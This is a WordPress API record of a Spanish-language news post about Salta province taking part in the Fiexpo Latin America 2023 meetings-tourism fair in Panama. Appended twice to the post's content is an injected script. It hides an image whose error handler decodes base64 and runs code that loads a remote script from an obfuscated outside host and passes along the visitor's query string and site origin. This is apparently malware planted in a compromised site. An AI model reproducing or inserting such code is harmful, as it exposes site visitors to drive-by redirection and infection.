{"id":2769,"date":"2023-06-23T10:09:12","date_gmt":"2023-06-23T13:09:12","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2769"},"modified":"2025-08-14T00:14:21","modified_gmt":"2025-08-14T03:14:21","slug":"salta-presente-en-fiexpo-latin-america-2023","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2769","title":{"rendered":"Salta presente en Fiexpo Latin America 2023"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\"><em>Es la feria de Turismo de Reuniones m\u00e1s importante de Latinoam\u00e9rica y se realiz\u00f3 por segunda vez en Panam\u00e1.<\/em><\/h3>\n\n\n\n<p>Una vez m\u00e1s el destino Salta particip\u00f3 de Fiexpo Latin America 2023, la feria m\u00e1s importante de Turismo de Reuniones de Latinoam\u00e9rica, que se llev\u00f3 a cabo en el Panama Convention Center del 19 al 22 de junio.<\/p>\n\n\n\n<p>Representada por&nbsp;<strong>Andrea Pieve<\/strong>, presidenta del Centro de Convenciones Salta, la provincia expuso toda su oferta del sector de reuniones en el stand de Argentina, promovida por el Inprotur Argentina, junto a autoridades nacionales y c\u00e1maras empresariales del sector p\u00fablico y privado.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7636-salta-presente-en-fiexpo-latin-america-2023.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7636-salta-presente-en-fiexpo-latin-america-2023.jpg\" alt=\"Salta presente en Fiexpo Latin America 2023\"\/><\/a><\/figure>\n\n\n\n<p>Fiexpo Latin America es el lugar por excelencia donde los destinos y proveedores especializados en la Industria de Reuniones, Eventos e Incentivos pueden conectarse con los m\u00e1s destacados compradores a nivel global. El espacio brinda la posibilidad de establecer v\u00ednculos con las m\u00e1s altas autoridades y responsables de la elaboraci\u00f3n de pol\u00edticas para garantizar que se comprendan y reconozcan los beneficios econ\u00f3micos, interculturales y sociales de la Industria MICE en Latinoam\u00e9rica.<\/p>\n\n\n\n<p>El evento inici\u00f3 este lunes 19 de junio con foros, talleres y congresos, e inaugur\u00f3 este mi\u00e9rcoles 21 de junio su espacio de exhibiciones comerciales.<\/p>\n\n\n\n<p>Participaron m\u00e1s de 10 destinos de Latinoam\u00e9rica, cientos de profesionales y una agenda cargada de temas que se presentaron por primera vez en cuatro escenarios interactivos (durante el evento Panam\u00e1 Meetings Hub), donde 60 conferencistas nacionales e internacionales abordaron las \u00faltimas tendencias sobre el turismo de reuniones.<\/p>\n\n\n\n<p>\u201cEstar en este gran evento en Panam\u00e1 representando al destino Salta, a trav\u00e9s del Ministerio de Turismo y Deportes de Salta y el Inprotur Salta, es muy importante para seguir potenciando la provincia en la industria de reuniones\u201d indic\u00f3 Andrea Pieve, agregando que \u201ceste intercambio de herramientas de formaci\u00f3n y el contacto comercial nos permite un mayor crecimiento que suma al gran trabajo que el sector p\u00fablico y privado realiza en nuestro destino, y que se alinea al objetivo de seguir posicion\u00e1ndonos como una de las sedes de eventos nacionales e internacionales m\u00e1s elegidas de la regi\u00f3n\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7637-salta-presente-en-fiexpo-latin-america-2023.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7637-salta-presente-en-fiexpo-latin-america-2023.jpg\" alt=\"Salta presente en Fiexpo Latin America 2023\"\/><\/a><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/salta-presente-en-fiexpo-latin-america-2023-90301\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Es la feria de Turismo de Reuniones m\u00e1s importante de Latinoam\u00e9rica y se realiz\u00f3 por segunda vez en Panam\u00e1. Una vez m\u00e1s el destino Salta particip\u00f3 de Fiexpo Latin America 2023, la feria m\u00e1s importante de Turismo de Reuniones de Latinoam\u00e9rica, que se llev\u00f3 a cabo en el Panama Convention Center del 19 al 22 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2770,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[8,16],"tags":[],"class_list":{"0":"post-2769","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-eventos","8":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2769"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2769"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2769\/revisions"}],"predecessor-version":[{"id":7048,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2769\/revisions\/7048"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2770"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2769"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2769"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2769"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}